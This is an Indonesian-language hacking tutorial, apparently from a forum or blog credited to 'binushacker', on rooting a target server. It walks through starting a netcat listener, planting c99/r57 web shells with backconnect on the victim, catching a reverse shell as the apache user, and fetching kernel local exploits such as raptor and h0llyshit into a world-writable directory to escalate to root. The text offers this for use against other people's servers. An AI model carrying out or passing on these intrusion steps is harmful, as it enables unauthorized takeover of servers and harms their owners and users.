Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root”
merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda
bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:
Asumsikan bahwa:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat
fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl
backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan
bahwa terdapat koneksi ke server anda dari target.
Contoh:
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386
GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command
Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER,
ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2,
h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal
gunakan jari jemari anda untuk menemukannya
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa
execute. Kita cari saja yang 777 (misal: /var/tmp).
whoami
Sumber ; binushacker
Gudangku.tk